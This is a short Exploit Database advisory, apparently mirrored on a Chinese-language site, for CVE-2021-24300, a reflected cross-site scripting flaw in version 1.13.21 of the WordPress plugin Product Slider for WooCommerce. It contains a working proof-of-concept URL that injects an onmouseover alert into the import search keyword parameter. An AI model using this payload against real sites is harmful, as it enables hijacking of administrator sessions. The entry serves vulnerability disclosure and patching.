WordPress Plugin Product Slider for WooCommerce 1.13.21 – Cross Site Scripting (XSS)

• Exploit Database
• 96 阅读

• 作者： 0xB9
  日期： 2022-02-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50704/

• # Exploit Title: WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)
  # Date: 3/16/2021
  # Author: 0xB9
  # Software Link: https://wordpress.org/plugins/woocommerc...ts-slider/
  # Version: 1.13.21
  # Tested on: Windows 10
  # CVE: CVE-2021-24300
  
  1. Description:
  This plugin is a easy carousel slider for WooCommerce products. The slider import search feature is vulnerable to reflected cross-site scripting.
  
  2. Proof of Concept:
  wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover=alert(1);//
  

  Python

  Copy